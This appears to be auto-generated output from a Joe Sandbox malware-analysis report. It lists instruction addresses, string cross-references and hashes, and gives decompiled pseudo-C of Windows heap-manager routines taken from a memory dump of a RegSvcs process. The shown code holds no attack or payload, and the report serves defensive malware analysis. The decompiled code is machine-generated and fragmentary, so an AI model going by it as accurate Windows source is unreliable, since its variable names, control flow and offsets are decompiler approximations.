0x00000000
0x00fd5b20
0x00fd5a92
0x00fd5a95
0x00fd5a98
0x00fd5afb
0x00fd5b01
0x00000000
0x00fd5b01
0x00fd5a9a
0x00fd5a9d
0x00fd5aa0
0x00fd5aa2
0x00fd5aa8
0x00fd5aab
0x00fd5aaf
0x00fd5ab4
0x00fd5ab6
0x00fd5abc
0x00fd5abf
0x00fd5ac2
0x00fd5ad1
0x00fd5ad6
0x00fd5ad8
0x0101ed86
0x0101ed95
0x0101ed9d
0x0101ed9d
0x00fd5ade
0x00fd5ae1
0x00fd5ae1
0x00fd5aea
0x00fd5aea
0x00fd5aec
0x00fd5af2
0x00fd64f8
0x00fd64fb
0x00000000
0x00fd5af8
0x00fd5af8
0x00000000
0x00fd5af8
0x00fd5af2
0x00fd5a61
0x00fd59fc
0x00fd58d4
0x00fd58cc
0x00fd68c0
0x00fd68c0
0x00000000
0x00fd68c0
0x00fd57ed
0x00fd61c0
0x00fd61c2
0x00fd61c2
0x00000000
0x00fd57e0
0x00fd57b7
0x00fd57bb
0x00fd6307
0x00fd630a
0x00fd630d
0x00fd6311
0x00fd6316
0x00fd6320
0x00fd6323
0x0101ec54
0x0101ec59
0x0101ec59
0x00fd6323
0x00fd6329
0x00fd6329
0x00fd632c
0x00fd6332
0x00fd6334
0x00fd6337
0x00fd633a
0x00fd633d
0x00fd633f
0x00fd6342
0x00fd6344
0x0101ecc0
0x0101ecc0
0x0101ecc6
0x0101eccb
0x00000000
0x00fd634a
0x00fd634a
0x00fd634c
0x00000000
0x00000000
0x00fd6355
0x00fd6358
0x00fd635e
0x00fd6361
0x00fd6363
0x00fd6496
0x00fd6496
0x00fd6499
0x00fd649c
0x00fd649e
0x00fd64a1
0x00fd64a5
0x00fd6c01
0x00fd6c06
0x00fd6c08
0x00000000
0x00000000
0x0101ecb7
0x0101ecb9
0x0101ecd0
0x0101ecd0
0x0101ecda
0x0101ece4
0x0101eceb
0x0101ecfb
0x00000000
0x0101ecfb
0x00fd64ab
0x00fd64ab
0x00000000
0x00fd64ab
0x00fd6369
0x00fd6370
0x00fd6370
0x00fd6373
0x00fd6375
0x00000000
0x00000000
0x00fd6718
0x00fd671a
0x00fd671c
0x0101ec63
0x0101ec63
0x00000000
0x0101ec63
0x00fd6722
0x00fd6724
0x00fd6724
0x00fd637b
0x00fd6384
0x00fd6389
0x00fd638c
0x00fd638f
0x00fd6393
0x0101ec6b
0x00fd6399
0x00fd6399
0x00fd6399
0x00fd639b
0x00fd63a2
0x00fd63a8
0x00fd63aa
0x00fd63af
0x00fd63b5
0x00fd63b8
0x00fd63bb
0x00fd63be
0x00fd63be
0x00fd63c1
0x00fd63c4
0x00fd63c6
0x00fd6bf5
0x00fd6bf5
0x00fd63d2
0x00fd63d8
0x00000000
0x00fd63de
0x00fd63de
0x00fd63e4
0x00fd63e7
0x00fd65ec
0x00fd65ef
0x00fd65f2
0x00fd65f2
0x00fd63ed
0x00fd63f0
0x00fd63f9
0x00fd63fc
0x00fd63ff
0x00fd6402
0x0101ec95
0x0101ec98
0x0101ec9b
0x0101eca4
0x00000000
0x0101eca4
0x0101ec9d
0x00000000
0x00fd6408
0x00fd6408
0x00fd640b
0x00fd646e
0x00fd6474
0x00fd647b
0x00fd647b
0x00fd648e
0x00fd6493
0x00fd6493
0x00fd6493
0x00000000
0x00fd6493
0x00fd640d
0x00fd6410
0x00fd6413
0x00fd6415
0x00fd641b
0x00fd641e
0x00fd6422
0x00fd6427
0x00fd6429
0x00fd642f
0x00fd6432
0x00fd6438
0x00fd6447
0x00fd644c
0x00fd644e
0x0101ec73
0x0101ec82
0x0101ec8d
0x0101ec8d
0x00fd6454
0x00fd6454
0x00fd645d
0x00fd645d
0x00fd645f
0x00fd6465
0x00fd6706
0x00fd6709
0x00000000
0x00fd646b
0x00fd646b
0x00000000
0x00fd646b
0x00fd6465
0x00fd6402
0x00fd63d8
0x00fd6344
0x00000000
0x00fd57bb
0x00fd572e
0x00fd5731
0x00fd6509
0x00fd650f
0x00000000
0x00000000
0x00fd6515
0x00fd651c
0x0101ec26
0x0101ec2d
0x00000000
0x00000000
0x0101ec33
0x00fd6522
0x00fd6529
0x00fd652f
0x00fd652f
0x00000000
0x00fd6529
0x00fd5737
0x00fd573d
0x00000000
0x00000000
0x00fd574a
0x00fd574c
0x00fd5755
0x00fd5758
0x00fd5764
0x00fd57ad
0x00fd57ad
0x00000000
0x00fd57ad
0x00fd576c
0x00fd576f
0x00fd5775
0x00fd5779
0x00fd5783
0x00fd66a6
0x00fd66a6
0x00fd66a9
0x00fd66ab
0x0101ec38
0x00fd66b1
0x00fd66b1
0x00fd66b1
0x00fd66b3
0x00fd66ba
0x00fd69ac
0x00fd66c0
0x00fd66c0
0x00fd66c0
0x00fd66cb
0x00fd66ce
0x00fd66d3
0x00fd66d6
0x00fd69b3
0x00fd69ba
0x0101ec42
0x0101ec49
0x00000000
0x00000000
0x0101ec4f
0x00fd69c0
0x00fd66dc
0x00fd66dc
0x00fd66df
0x00fd66ea
0x00fd66ed
0x00fd66ef
0x00fd66ef
0x00000000
0x00fd66d6
0x00fd578f
0x00fd669c
0x00000000
0x00fd57a3
0x00fd57a3
0x00000000
0x00fd57a3
0x00fd56c4
0x00fd56c4
0x00fd56ca
0x00fd56d4
0x00fd56d9
0x00fd6856
0x00fd6859
0x00fd685c
0x00fd68c7
0x00000000
0x00fd68c7
0x00fd685e
0x00fd6868
0x00fd686f
0x0101ebf3
0x0101ebfd
0x0101ec07
0x0101ec0e
0x0101ec1e
0x00fd5fcf
0x00fd5fcf
0x00fd5fd6
0x00fd5fe1
0x00fd5fe4
0x00fd5fe6
0x0101f58f
0x0101f592
0x00000000
0x00000000
0x0101f5a1
0x00fd5ff1
0x00fd5ff1
0x00fd5ff4
0x00fd5ff7
0x0101f5ab
0x0101f5ad
0x0101f5b3
0x0101f5b6
0x0101f5b8
0x0101f5c9
0x0101f5c9
0x0101f5b8
0x0101f5ad
0x00fd5ffd
0x00fd5fff
0x00fd6002
0x00fd6010
0x00fd6010
0x00fd5fec
0x00fd5fec
0x00000000
0x00fd5fec
0x00fd6875
0x00fd6885
0x00fd688f
0x00fd6891
0x00000000
0x00fd56df
0x00fd56df
0x00fd56e2
0x00fd56e5
0x00fd56ec
0x00fd56ec
0x00fd56f6
0x00fd56fc
0x00fd56fc
0x00fd5700
0x00fd570b
0x00fd69cc
0x00fd69ce
0x00fd69ce
0x00fd5711
0x00000000
0x00fd5711
0x00fd56d9
0x00fd56c2

Strings

HEAP: , xrefs: 0101EE8B, 0101F109
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 0101EEA5, 0101F123
HEAP[%wZ]: , xrefs: 0101EE7C, 0101F0FA

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: c5fe76ed47d090474c61ba5d5405f350a6ea34dbe23d673e9e4c6128935504c0
Instruction ID: 67fbe431351dfe3027c5c698ecd31cedd8dc10a69005ec69050b29a1bfbefd8f
Opcode Fuzzy Hash: c5fe76ed47d090474c61ba5d5405f350a6ea34dbe23d673e9e4c6128935504c0
Instruction Fuzzy Hash: A7239E70E00619DFDB15CF68C4807ADBBF2BF49314F2881AAE84AAB345D735A945EF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA830 Relevance: 5.4, Strings: 4, Instructions: 350
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E00FDA830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x10a8748 - 1;
					if( *0x10a8748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E00FBB150();
									_t260 = _t257 + 4;
								} else {
									E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E00FBB150();
								_t257 = _t260 + 4;
								__eflags =  *0x10a7bc8;
								if(__eflags == 0) {
									E01072073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0107A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E0100D5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E00FDAB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0107A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0107A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x10a8748 - 1;
					if( *0x10a8748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E00FBB150();
							} else {
								E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E00FBB150();
							__eflags =  *0x10a7bc8;
							if(__eflags == 0) {
								_t131 = E01072073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}

0x00fda83a
0x00fda83c
0x00fda83e
0x00fda841
0x00fda844
0x00fda84a
0x00fdaa53
0x00fdaa59
0x00fdaa59
0x00fda858
0x00fda85e
0x00fdaaf5
0x00fdaafc
0x0102229e
0x010222a2
0x010222a8
0x010222b3
0x010222b5
0x010222bb
0x010222c1
0x010222c5
0x010222e6
0x010222eb
0x010222f0
0x010222c7
0x010222dc
0x010222e1
0x010222e1
0x010222f3
0x010222f8
0x010222fd
0x01022300
0x01022307
0x0102230e
0x0102230e
0x01022313
0x01022313
0x010222b5
0x010222a2
0x00fdaafc
0x00fda864
0x00fda869
0x00fdaa5c
0x00fdaa5e
0x00fda86f
0x00fda87f
0x00fda885
0x00fda885
0x00fda88b
0x00fda890
0x00fda896
0x00fdab0c
0x00fdab0f
0x00fdab15
0x01022320
0x01022320
0x00fdab1b
0x00fda89c
0x00fda89f
0x00fda8a2
0x00fda8a2
0x00fda8a5
0x00fda8af
0x00fda8b3
0x00fda8b8
0x00fdaa66
0x00fda8be
0x00fda8c5
0x00fda8c6
0x00fda8ce
0x01022328
0x01022332
0x01022337
0x01022337
0x00fda8ce
0x00fda8d4
0x00fda8d8
0x00fda8db
0x00fda8de
0x00fda8e1
0x00fda8e5
0x00fda8e8
0x00fda8f0
0x00fda8f3
0x0102234c
0x01022350
0x01022355
0x01022359
0x01022359
0x00fda8f9
0x00fda901
0x00fdaae4
0x00fdaae4
0x00fdaaea
0x00000000
0x00fda907
0x00fda90a
0x00fda91d
0x00fda91d
0x00000000
0x00fda910
0x00fda910
0x00fda910
0x00fda914
0x00fda924
0x00fda924
0x00fda924
0x00fda924
0x00fda916
0x00fda91b
0x00000000
0x00000000
0x00000000
0x00fda91b
0x00fda925
0x00fda925
0x00fda932
0x00fda936
0x00fda93c
0x00fda93c
0x00fda93c
0x00fdab22
0x00fdab24
0x00fdab27
0x00fdab27
0x00fda942
0x00fda944
0x00fdaaba
0x00fdaabd
0x00fdaac0
0x00fdaac0
0x00fdaac2
0x00fdab2f
0x00fdaac4
0x00fdaac4
0x00fdaac7
0x00fdaaca
0x00fdaacc
0x00fdaace
0x00fdaace
0x00fdaace
0x00fdaad1
0x00fdaad1
0x00fdaad7
0x00fdaad9
0x00000000
0x00000000
0x01022361
0x01022369
0x0102236b
0x00000000
0x01022371
0x00000000
0x01022371
0x00000000
0x0102236b
0x00fdaac0
0x00fda94a
0x00fda94a
0x00fda94d
0x00fda94d
0x00fda950
0x00fda954
0x01022376
0x01022380
0x00fda95a
0x00fda95a
0x00fda95c
0x00fda95f
0x00fda961
0x00fda961
0x00fda967
0x00fda96a
0x00fda972
0x00fdaa02
0x00fdaa06
0x00fdaa10
0x00fdaa16
0x00fdaa16
0x00fdaa1b
0x00fdaa21
0x00fdaa24
0x00fdaa27
0x00fdaa29
0x00fdaa2c
0x00fdaa32
0x00000000
0x00000000
0x00000000
0x00000000
0x00fda978
0x00fda978
0x00fda97b
0x00fda981
0x00fda996
0x00fda998
0x00fda99f
0x00fda9a2
0x0102238a
0x00fda9a8
0x00fda9a8
0x00fda9a8
0x00fda9aa
0x00fda9ad
0x00fda9b0
0x00fda9bb
0x00fda9be
0x00fda9c7
0x00fda9c9
0x00fda9c9
0x00fda9cc
0x00fda9d1
0x00fdaa6d
0x00fdaa70
0x00fdaa73
0x00fdaa75
0x00fdaa79
0x00fdaa7e
0x00fdaa82
0x00fdaa8f
0x00fdaa94
0x00fdaa96
0x01022392
0x010223a1
0x010223a1
0x00fdaa9c
0x00fdaa9f
0x00fdaaa2
0x00fdaaa2
0x00fdaaa8
0x00fdaaab
0x00fdaaaf
0x00000000
0x00fdaab5
0x00000000
0x00fdaab5
0x00fda9d7
0x00fda9d7
0x00fda9da
0x00fda9e0
0x00fda9e3
0x00fda9e6
0x00fda9e9
0x00fda9eb
0x00fda9fd
0x00fda9fd
0x00000000
0x00fda9eb
0x00000000
0x00000000
0x00000000
0x00fda983
0x00fda983
0x00fda983
0x00fda987
0x00fda995
0x00fda995
0x00fda995
0x00fda995
0x00fda989
0x00fda98e
0x00000000
0x00fda990
0x00000000
0x00fda990
0x00fda98e
0x00000000
0x00fda983
0x00fda972
0x00fda90a
0x00fdaa34
0x00fdaa34
0x00fdaa40
0x00fdaa43
0x00fdaa46
0x00fdaa4d
0x010223ab
0x010223b2
0x010223b8
0x010223be
0x010223c3
0x010223c5
0x010223cb
0x010223d1
0x010223d5
0x010223f6
0x010223fb
0x010223d7
0x010223ec
0x010223f1
0x01022403
0x01022408
0x01022410
0x01022417
0x01022422
0x01022422
0x01022417
0x010223c5
0x010223b2
0x00000000

Strings

((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 010222F3
HEAP: , xrefs: 010222E6, 010223F6
ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 01022403
HEAP[%wZ]: , xrefs: 010222D7, 010223E7

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
API String ID: 0-1657114761
Opcode ID: faeb8d23a051187c7d9ea23a7e1dacc570c92a2dda889e0b33c9a545ab90d03b
Instruction ID: ab45735a5326f7d9c07628d2034fc8feff352f10f423d532522774a3b00d67a0
Opcode Fuzzy Hash: faeb8d23a051187c7d9ea23a7e1dacc570c92a2dda889e0b33c9a545ab90d03b
Instruction Fuzzy Hash: A7D1E430A00245DFDB19CF68C4907BAB7F2FF48310F19856AD8969B345E338E945EB56

Uniqueness

Uniqueness Score: -1.00%

Function 00FDA229 Relevance: 5.2, Strings: 4, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E00FDA229(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				char _v28;
				void* _v44;
				void* _v48;
				void* _v56;
				void* _v60;
				void* __ebx;
				signed int _t55;
				signed int _t57;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				void* _t71;
				signed char* _t74;
				intOrPtr _t75;
				signed char* _t80;
				intOrPtr _t81;
				void* _t82;
				signed char* _t85;
				signed char _t91;
				void* _t103;
				void* _t105;
				void* _t121;
				void* _t129;
				signed int _t131;
				void* _t133;

				_t105 = __ecx;
				_t133 = (_t131 & 0xfffffff8) - 0x1c;
				_t103 = __edx;
				_t129 = __ecx;
				E00FDDF24(__edx,  &_v28, _t133);
				_t55 =  *(_t129 + 0x40) & 0x00040000;
				asm("sbb edi, edi");
				_t121 = ( ~_t55 & 0x0000003c) + 4;
				if(_t55 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t129);
					_push(0xffffffff);
					_t57 = E00FF9730();
					__eflags = _t57;
					if(_t57 < 0) {
						L17:
						_push(_t105);
						E0107A80D(_t129, 1, _v20, 0);
						_t121 = 4;
						goto L1;
					}
					__eflags = _v20 & 0x00000060;
					if((_v20 & 0x00000060) == 0) {
						goto L17;
					}
					__eflags = _v24 - _t129;
					if(_v24 == _t129) {
						goto L1;
					}
					goto L17;
				}
				L1:
				_push(_t121);
				_push(0x1000);
				_push(_t133 + 0x14);
				_push(0);
				_push(_t133 + 0x20);
				_push(0xffffffff);
				_t61 = E00FF9660();
				_t122 = _t61;
				if(_t61 < 0) {
					_t62 =  *[fs:0x30];
					 *((intOrPtr*)(_t129 + 0x218)) =  *((intOrPtr*)(_t129 + 0x218)) + 1;
					__eflags =  *(_t62 + 0xc);
					if( *(_t62 + 0xc) == 0) {
						_push("HEAP: ");
						E00FBB150();
					} else {
						E00FBB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *((intOrPtr*)(_t133 + 0xc)));
					_push( *((intOrPtr*)(_t133 + 0x14)));
					_push(_t129);
					E00FBB150("ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t122);
					_t65 = 0;
					L13:
					return _t65;
				}
				_t71 = E00FD7D50();
				_t124 = 0x7ffe0380;
				if(_t71 != 0) {
					_t74 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t74 = 0x7ffe0380;
				}
				if( *_t74 != 0) {
					_t75 =  *[fs:0x30];
					__eflags =  *(_t75 + 0x240) & 0x00000001;
					if(( *(_t75 + 0x240) & 0x00000001) != 0) {
						E0107138A(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)),  *((intOrPtr*)(_t133 + 0x10)), 8);
					}
				}
				 *((intOrPtr*)(_t129 + 0x230)) =  *((intOrPtr*)(_t129 + 0x230)) - 1;
				 *((intOrPtr*)(_t129 + 0x234)) =  *((intOrPtr*)(_t129 + 0x234)) -  *((intOrPtr*)(_t133 + 0xc));
				if(E00FD7D50() != 0) {
					_t80 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				} else {
					_t80 = _t124;
				}
				if( *_t80 != 0) {
					_t81 =  *[fs:0x30];
					__eflags =  *(_t81 + 0x240) & 0x00000001;
					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E00FD7D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01071582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E00FD7D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E00FD7D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01071582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E0100D5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}

0x00fda229
0x00fda231
0x00fda23f
0x00fda242
0x00fda244
0x00fda24c
0x00fda255
0x00fda25a
0x00fda25f
0x01021c76
0x01021c78
0x01021c7e
0x01021c7f
0x01021c81
0x01021c82
0x01021c84
0x01021c89
0x01021c8b
0x01021c9e
